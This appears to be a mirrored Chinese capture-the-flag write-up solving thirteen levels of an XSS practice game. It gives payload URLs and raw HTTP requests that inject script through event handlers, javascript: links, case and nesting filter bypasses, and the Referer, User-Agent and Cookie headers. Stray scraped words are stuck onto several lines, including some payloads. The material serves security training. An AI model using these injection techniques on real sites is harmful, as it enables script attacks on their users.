【CTF】某xss练手小游戏

时间 2020-06-20

标签 CTF xss 游戏栏目 JavaScript 繁體版

原文原文链接

http://test.xss.tvjavascript

一、http://47.94.13.75/test/level1.php?name=testphp

　　直接插入便可，如：html

　　http://47.94.13.75/test/level1.php?name=<script>alert(1)</script>java

二、http://47.94.13.75/test/level2.php?keyword=testcookie

　　文本框中输入，闭合一下便可，如：app

　　http://47.94.13.75/test/level2.php?keyword="><script>alert(1)</script>xss

三、http://47.94.13.75/test/level3.php?writing=waitpost

　　尖括号被编码，直接使用事件便可，如：编码

　　http://47.94.13.75/test/level3.php?keyword=' onmouseover=alert(1) '&submit=搜索url

四、http://47.94.13.75/test/level4.php?keyword=try harder!

　　与第三关相似，使用事件来闭合，弹窗，如：

　　http://47.94.13.75/test/level4.php?keyword=" onmouseover=alert(1) "&submit=搜索

五、http://47.94.13.75/test/level5.php?keyword=find a way out!

　　事件被插入特殊符号，改用其它标签，如：

　　http://47.94.13.75/test/level5.php?keyword="><a href=javascript:alert(1)>click</a>&submit=搜索

　　点击click连接便可弹窗

六、http://47.94.13.75/test/level6.php?keyword=break it out!

　　与第五关相似，这里能够直接用大写绕过，如：

　　http://47.94.13.75/test/level6.php?keyword=" Onmouseover=alert(1) "&submit=搜索

七、http://47.94.13.75/test/level7.php?keyword=move up!

　　on直接被过滤，用嵌套绕过，如：

　　http://47.94.13.75/test/level7.php?keyword=" oonnmouseover=alert(1) "&submit=搜索

八、http://47.94.13.75/test/level8.php?keyword=nice try!

　　连接型，js协议加编码绕过绕过，如：

　　http://47.94.13.75/test/level8.php?keyword=javascript:alert(1)&submit=添加友情连接

九、http://47.94.13.75/test/level9.php?keyword=not bad!

　　构造合法连接，结合js协议与编码绕过，如：

　　http://47.94.13.75/test/level9.php?keyword=javascript:alert("http://")&submit=添加友情连接

十、http://47.94.13.75/test/level10.php?keyword=well done!

　　根据源码构造url参数，如：

　　http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" onmouseover=alert(1) type="button" "

　　http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" accesskey="X" onclick=“alert(1) ///经过shift+alt+X快捷键触发（火狐能够）　

十一、http://47.94.13.75/test/level11.php?keyword=good job!

　　抓取post数据包，构造referer值，如：

GET /test/level11.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Referer:" onmouseover=alert(1) type="button" "

十二、http://47.94.13.75/test/level12.php?keyword=good job!

　　构造user-agent值便可，如：

GET /test/level12.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0" onmouseover=alert(1) type="button" "
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

1三、http://47.94.13.75/test/level13.php?keyword=good job!

　　构造cookie，如：

GET /test/level13.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: user=call+me+maybe%3F" onmouseover=alert(1) type="button" "
Connection: keep-alive
Upgrade-Insecure-Requests: 1